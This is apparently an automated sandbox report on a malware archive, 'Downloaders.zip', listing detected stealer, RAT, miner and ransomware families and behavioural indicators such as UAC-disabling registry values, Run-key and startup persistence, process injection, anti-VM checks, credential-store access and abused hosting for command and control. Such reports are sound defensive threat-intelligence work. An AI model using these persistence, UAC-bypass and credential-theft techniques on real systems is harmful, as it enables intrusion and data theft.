Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Gurcu, WhiteSnake
Redline family
Gurcu family
RMS
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
Stealc
Remcos family
RedLine
Quasar RAT
Discord RAT
44Caliber family
Xworm
Quasar payload
Detect Umbral payload
Gh0st RAT payload
Remcos
Xworm family
Umbral family
Lumma Stealer, LummaC
xmrig
Quasar family
RedLine payload
Gh0strat family
Lockbit family
Umbral
Rule to detect Lockbit 3.0 ransomware Windows payload
Asyncrat family
AsyncRat
Detects Go variant of Hive Ransomware
Azorult
44Caliber
Xmrig family
Lockbit
Lumma family
UAC bypass
Amadey family
Detect Xworm Payload
Meduza
Rms family
Vidar family
Hive
Discordrat family
Meduza Stealer payload
Hive family
Vidar
Phorphiex family
Phorphiex payload
Meduza family
Phorphiex, Phorpiex
Gh0strat
Suspicious use of NtCreateProcessExOtherParentProcess
Detect Vidar Stealer
Azorult family
Detected Nirsoft tools
Enumerates VirtualBox registry keys
XMRig Miner payload
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Stops running service(s)
Uses browser remote debugging
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Adds policy Run key to start application
Modifies Windows Firewall
Sets file to hidden
VMProtect packed file
A potential corporate email address has been identified in the URL: 3SCET_Admin@OFGADUSE_report.wsr
Reads data files stored by FTP clients
Checks computer location settings
Reads user/profile data of web browsers
Indicator Removal: Clear Windows Event Logs
Identifies Wine through registry keys
A potential corporate email address has been identified in the URL: oDRAV_Admin@OFGADUSE_report.wsr
A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr
Checks BIOS information in registry
Loads dropped DLL
Clipboard Data
Drops startup file
Unsecured Credentials: Credentials In Files
A potential corporate email address has been identified in the URL: naAjO_Admin@OFGADUSE_report.wsr
Reads WinSCP keys stored on the system
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Power Settings
Indicator Removal: File Deletion
Enumerates connected drives
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Drops desktop.ini file(s)
Obfuscated Files or Information: Command Obfuscation
Network Service Discovery
Blocklisted process makes network request
Suspicious use of SetThreadContext
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
UPX packed file
AutoIT Executable
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
Event Triggered Execution: Installer Packages
Access Token Manipulation: Create Process with Token
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Browser Information Discovery
Program crash
Detects Pyinstaller
Event Triggered Execution: Netsh Helper DLL
Uses Volume Shadow Copy service COM API
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
outlook_win_path
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies Internet Explorer settings
outlook_office_path
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Runs ping.exe
Modifies registry key
Gathers system information
Modifies registry class
Checks processor information in registry
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Scheduled Task/Job: Scheduled Task
Delays execution with timeout.exe
Suspicious use of SendNotifyMessage
Kills process with taskkill
GoLang User-Agent
Runs .reg file with regedit
Suspicious behavior: MapViewOfSection
Detects videocard installed
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-12 18:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-12 18:20
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
130s
Max time network
301s
Command Line
Signatures
Amadey
Amadey family
AsyncRat
Asyncrat family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Go variant of Hive Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gh0strat
Gh0strat family
Gurcu family
Gurcu, WhiteSnake
Hive
Hive family
Lockbit
Lockbit family
Lumma Stealer, LummaC
Lumma family
Meduza
Meduza Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Meduza family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Rule to detect Lockbit 3.0 ransomware Windows payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5596 created 3420 | N/A | C:\Users\Admin\AppData\Local\Temp\3161510603.exe | C:\Windows\Explorer.EXE |
| PID 5596 created 3420 | N/A | C:\Users\Admin\AppData\Local\Temp\3161510603.exe | C:\Windows\Explorer.EXE |
| PID 5760 created 3420 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 5760 created 3420 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 5760 created 3420 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 4312 created 3420 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\Explorer.EXE |
| PID 4312 created 3420 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\Explorer.EXE |
| PID 3272 created 2988 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe | C:\Windows\system32\sihost.exe |
| PID 4604 created 3420 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
Vidar
Vidar family
Xworm
Xworm family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1989129625.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Roaming\\System.exe" | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
Checks installed software on the system
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe | N/A |
| File opened for modification | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1888 set thread context of 5684 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4056 set thread context of 5856 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 5760 set thread context of 4312 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 5760 set thread context of 4108 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
| PID 3364 set thread context of 2944 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 8 set thread context of 4688 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\4434.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A |
| File created | C:\Windows\Tasks\defnur.job | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\ProgramData\javaw.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2309417675.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\281730318.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\fontdrvhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\steel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\4434.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\clip.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe | N/A |
